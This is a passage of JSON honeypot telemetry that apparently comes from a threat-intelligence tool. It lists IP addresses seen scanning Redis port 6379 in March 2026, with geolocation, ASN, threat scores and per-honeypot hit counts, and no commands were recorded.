      "score_components": {
        "frequency": 6.0,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T05:02:12.671000+00:00",
        "last_seen_30d": "2026-03-31T21:50:02.644000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "137.184.169.162": {
      "attack_count": 20,
      "first_seen": "2026-03-15T09:46:29.000Z",
      "last_seen": "2026-03-15T09:47:37.633Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 63.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 121764,
        "days_active_30d": 10,
        "ports_targeted_30d": 65946,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-15T09:44:00+00:00",
        "last_seen_30d": "2026-03-24T17:11:17.631000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 107738,
        "Honeytrap": 13968,
        "ConPot": 10,
        "Dionaea": 9,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Adbhoney": 4,
        "Redishoneypot": 3,
        "Dicompot": 2,
        "Tanner": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1
      }
    },
    "157.230.189.8": {
      "attack_count": 20,
      "first_seen": "2026-03-03T02:15:12.000Z",
      "last_seen": "2026-03-03T02:25:20.683Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 7.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 26.0,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 400,
        "days_active_30d": 3,
        "ports_targeted_30d": 15,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T14:05:46.593000+00:00",
        "last_seen_30d": "2026-03-04T00:34:02.256000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Suricata": 264,
        "Honeytrap": 119,
        "ElasticPot": 8,
        "Redishoneypot": 8,
        "Dionaea": 1
      }
    },
    "194.164.107.6": {
      "attack_count": 20,
      "first_seen": "2026-03-21T02:03:57.000Z",
      "last_seen": "2026-03-21T02:27:00.323Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 50219,
      "as_org": "Valence Technology Co.",
      "threat_score": 97.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 27.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 519,
        "days_active_30d": 30,
        "ports_targeted_30d": 60,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T11:47:18.743000+00:00",
        "last_seen_30d": "2026-03-31T05:35:17.191000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 382,
        "Honeytrap": 115,
        "CitrixHoneypot": 6,
        "Redishoneypot": 6,
        "Dionaea": 3,
        "H0neytr4p": 3,
        "ElasticPot": 2,
        "Honeyaml": 2
      }
    },
    "125.74.55.217": {
      "attack_count": 19,
      "first_seen": "2026-03-04T08:39:49.000Z",
      "last_seen": "2026-03-20T17:29:19.356Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 141998,
      "as_org": "China Telecom",
      "threat_score": 22.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T08:39:49+00:00",
        "last_seen_30d": "2026-03-20T17:29:19.356000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "134.209.75.100": {
      "attack_count": 19,
      "first_seen": "2026-03-05T06:29:20.000Z",
      "last_seen": "2026-03-05T06:30:30.099Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 4.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.3,
        "persistence": 1.7,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 43,
        "days_active_30d": 2,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T14:41:15+00:00",
        "last_seen_30d": "2026-03-05T06:30:30.099000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 23,
        "Honeytrap": 15,
        "Redishoneypot": 5
      }
    },
    "71.6.232.24": {
      "attack_count": 19,
      "first_seen": "2026-03-18T16:53:01.000Z",
      "last_seen": "2026-03-18T16:54:33.913Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 88.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 18.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 76,
        "days_active_30d": 30,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T01:18:06.990000+00:00",
        "last_seen_30d": "2026-03-31T18:46:01.154000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 56,
        "Redishoneypot": 6,
        "Honeytrap": 4,
        "Ciscoasa": 2,
        "Cowrie": 2,
        "Dionaea": 2,
        "Mailoney": 2,
        "H0neytr4p": 1,
        "Tanner": 1
      }
    },
    "159.223.173.170": {
      "attack_count": 17,
      "first_seen": "2026-03-03T02:15:04.000Z",
      "last_seen": "2026-03-03T02:16:16.284Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 2.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T02:15:05+00:00",
        "last_seen_30d": "2026-03-03T02:16:16.284000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "160.119.76.200": {
      "attack_count": 17,
      "first_seen": "2026-03-16T04:12:11.000Z",
      "last_seen": "2026-03-18T14:52:52.090Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Seychelles",
      "country_code": "SC",
      "city": null,
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 99.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 182408,
        "days_active_30d": 29,
        "ports_targeted_30d": 68109,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-03T01:18:11.842000+00:00",
        "last_seen_30d": "2026-03-31T17:38:02.790000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 159360,
        "Honeytrap": 22887,
        "H0neytr4p": 86,
        "Cowrie": 58,
        "Sentrypeer": 8,
        "Miniprint": 3,
        "ConPot": 2,
        "Redishoneypot": 2,
        "Dicompot": 1,
        "Dionaea": 1
      }
    },
    "20.221.56.179": {
      "attack_count": 17,
      "first_seen": "2026-03-16T04:41:35.000Z",
      "last_seen": "2026-03-16T04:44:00.477Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 41.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.6,
        "persistence": 8.3,
        "diversity": 10,
        "spread": 20,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 10,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-16T04:42:38.793000+00:00",
        "last_seen_30d": "2026-03-25T15:56:00.698000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13,
        "Honeytrap": 6,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "71.6.199.23": {
      "attack_count": 17,
      "first_seen": "2026-03-20T22:55:19.000Z",
      "last_seen": "2026-03-20T22:56:27.467Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 96.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 491,
        "days_active_30d": 30,
        "ports_targeted_30d": 83,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T10:53:50.466000+00:00",
        "last_seen_30d": "2026-03-31T13:48:58.626000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 357,
        "Honeytrap": 119,
        "H0neytr4p": 5,
        "Redishoneypot": 5,
        "Dionaea": 2,
        "ElasticPot": 2,
        "ConPot": 1
      }
    },
    "86.54.31.32": {
      "attack_count": 17,
      "first_seen": "2026-03-28T06:42:01.000Z",
      "last_seen": "2026-03-28T06:43:28.135Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": null,
      "asn": 12989,
      "as_org": "Black HOST Ltd",
      "threat_score": 95.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 366,
        "days_active_30d": 30,
        "ports_targeted_30d": 60,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T02:36:35+00:00",
        "last_seen_30d": "2026-03-31T05:56:26.355000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 258,
        "Honeytrap": 79,
        "Miniprint": 14,
        "Redishoneypot": 5,
        "Tanner": 5,
        "CitrixHoneypot": 2,
        "ConPot": 1,
        "Dicompot": 1,
        "Dionaea": 1
      }
    },
    "185.242.226.12": {
      "attack_count": 16,
      "first_seen": "2026-03-09T15:17:31.000Z",
      "last_seen": "2026-03-22T20:42:40.222Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1087,
        "days_active_30d": 25,
        "ports_targeted_30d": 497,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:05:41.432000+00:00",
        "last_seen_30d": "2026-03-26T01:05:30.965000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1087
      }
    },
    "20.168.121.140": {
      "attack_count": 15,
      "first_seen": "2026-03-24T02:34:49.000Z",
      "last_seen": "2026-03-24T02:36:27.221Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 44.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 18.3,
        "diversity": 12,
        "spread": 15,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 22,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T14:46:42.799000+00:00",
        "last_seen_30d": "2026-03-24T02:36:27.221000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 5,
        "Redishoneypot": 3
      }
    },
    "20.98.164.46": {
      "attack_count": 15,
      "first_seen": "2026-03-31T13:50:14.000Z",
      "last_seen": "2026-03-31T13:52:00.843Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 41.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 5.0,
        "diversity": 8,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 6,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-26T06:54:53+00:00",
        "last_seen_30d": "2026-03-31T13:52:00.843000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11,
        "Honeytrap": 6,
        "Redishoneypot": 3
      }
    },
    "144.24.3.130": {
      "attack_count": 14,
      "first_seen": "2026-03-22T08:26:41.000Z",
      "last_seen": "2026-03-22T23:03:23.942Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 13.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-22T08:27:44.419000+00:00",
        "last_seen_30d": "2026-03-22T23:03:23.942000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 2
      }
    },
    "91.196.152.63": {
      "attack_count": 14,
      "first_seen": "2026-03-23T18:39:15.000Z",
      "last_seen": "2026-03-23T18:40:19.877Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Roubaix",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 46.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 15.0,
        "diversity": 12,
        "spread": 20,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 18,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-07T14:15:45+00:00",
        "last_seen_30d": "2026-03-24T02:03:50.386000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 4,
        "Redishoneypot": 3,
        "Tanner": 1
      }
    },
    "91.230.168.142": {
      "attack_count": 14,
      "first_seen": "2026-03-09T11:24:35.000Z",
      "last_seen": "2026-03-09T11:25:37.183Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 93.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 245,
        "days_active_30d": 30,
        "ports_targeted_30d": 67,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T05:05:00.238000+00:00",
        "last_seen_30d": "2026-03-31T21:55:33.104000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 193,
        "Honeytrap": 44,
        "Cowrie": 4,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "46.29.167.115": {
      "attack_count": 13,
      "first_seen": "2026-03-04T21:36:48.000Z",
      "last_seen": "2026-03-04T21:38:04.434Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 49392,
      "as_org": "LLC Baxet",
      "threat_score": 3.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.0,
        "persistence": 0.8,
        "diversity": 16,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 1,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T20:57:48.913000+00:00",
        "last_seen_30d": "2026-03-04T21:38:04.434000+00:00",
        "days_since_last_seen": 27
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10
      }
    },
    "91.230.168.67": {
      "attack_count": 13,
      "first_seen": "2026-03-20T21:06:12.000Z",
      "last_seen": "2026-03-20T21:07:32.123Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 90.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.4,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 137,
        "days_active_30d": 29,
        "ports_targeted_30d": 50,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T17:35:15+00:00",
        "last_seen_30d": "2026-03-31T18:01:07.422000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 82,
        "Honeytrap": 47,
        "ConPot": 3,
        "Redishoneypot": 3,
        "Dicompot": 2
      }
    },
    "199.45.155.79": {
      "attack_count": 12,
      "first_seen": "2026-03-30T05:25:16.000Z",
      "last_seen": "2026-03-30T05:26:22.242Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 84.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.2,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 105,
        "days_active_30d": 29,
        "ports_targeted_30d": 23,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-03T18:49:32+00:00",
        "last_seen_30d": "2026-03-31T10:40:36.358000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 56,
        "Honeytrap": 31,
        "ConPot": 12,
        "Redishoneypot": 6
      }
    },
    "66.132.172.182": {
      "attack_count": 12,
      "first_seen": "2026-03-24T08:02:18.000Z",
      "last_seen": "2026-03-24T08:03:29.310Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 75.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.4,
        "persistence": 9.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 137,
        "days_active_30d": 11,
        "ports_targeted_30d": 32,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-21T23:33:27.855000+00:00",
        "last_seen_30d": "2026-03-31T08:47:57.274000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 87,
        "Honeytrap": 31,
        "Cowrie": 6,
        "Redishoneypot": 6,
        "ElasticPot": 4,
        "Honeyaml": 2,
        "Dionaea": 1
      }
    },
    "66.132.172.97": {
      "attack_count": 12,
      "first_seen": "2026-03-29T00:46:58.000Z",
      "last_seen": "2026-03-29T00:48:04.070Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 76.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.8,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 150,
        "days_active_30d": 12,
        "ports_targeted_30d": 33,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-20T05:29:35+00:00",
        "last_seen_30d": "2026-03-31T14:59:00.320000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 76,
        "Honeytrap": 54,
        "ElasticPot": 7,
        "Miniprint": 6,
        "Redishoneypot": 6,
        "Dicompot": 1
      }
    },
    "172.236.126.127": {
      "attack_count": 11,
      "first_seen": "2026-03-05T12:36:53.000Z",
      "last_seen": "2026-03-17T12:38:44.183Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Chicago",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 163,
        "days_active_30d": 30,
        "ports_targeted_30d": 158,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T17:57:07.366000+00:00",
        "last_seen_30d": "2026-03-31T17:10:32.410000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 163
      }
    },
    "101.126.20.199": {
      "attack_count": 10,
      "first_seen": "2026-03-13T11:54:10.000Z",
      "last_seen": "2026-03-27T00:48:30.335Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 137718,
      "as_org": "Beijing Volcano Engine Technology Co., Ltd.",
      "threat_score": 19.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 12.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 15,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-13T11:55:16.955000+00:00",
        "last_seen_30d": "2026-03-27T00:48:30.335000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "185.242.226.2": {
      "attack_count": 10,
      "first_seen": "2026-03-20T17:56:21.000Z",
      "last_seen": "2026-03-25T23:06:02.163Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1128,
        "days_active_30d": 25,
        "ports_targeted_30d": 502,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:11:57.650000+00:00",
        "last_seen_30d": "2026-03-26T01:14:56.355000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1128
      }
    },
    "103.100.27.123": {
      "attack_count": 9,
      "first_seen": "2026-03-20T04:22:07.000Z",
      "last_seen": "2026-03-20T04:23:11.571Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Indonesia",
      "country_code": "ID",
      "city": null,
      "asn": 136835,
      "as_org": "PT. GLobal Intermedia Nusantara",
      "threat_score": 11.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-20T04:22:07+00:00",
        "last_seen_30d": "2026-03-20T04:23:11.571000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "103.57.151.12": {
      "attack_count": 9,
      "first_seen": "2026-03-05T04:02:01.000Z",
      "last_seen": "2026-03-05T04:03:04.503Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Bangladesh",
      "country_code": "BD",
      "city": null,
      "asn": 63984,
      "as_org": "Nexdecade Technology Pvt. LTD",
      "threat_score": 2.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T04:02:01+00:00",
        "last_seen_30d": "2026-03-05T04:03:04.503000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "135.222.174.121": {
      "attack_count": 9,
      "first_seen": "2026-03-24T09:44:58.000Z",
      "last_seen": "2026-03-24T09:46:02.768Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 14.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-24T09:44:58+00:00",
        "last_seen_30d": "2026-03-24T09:46:02.768000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "18.188.53.152": {
      "attack_count": 9,
      "first_seen": "2026-03-11T17:27:24.000Z",
      "last_seen": "2026-03-11T17:28:29.279Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 23.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 24.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 292,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-11T17:27:24+00:00",
        "last_seen_30d": "2026-03-11T17:37:34.737000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 162,
        "Honeytrap": 110,
        "Dionaea": 9,
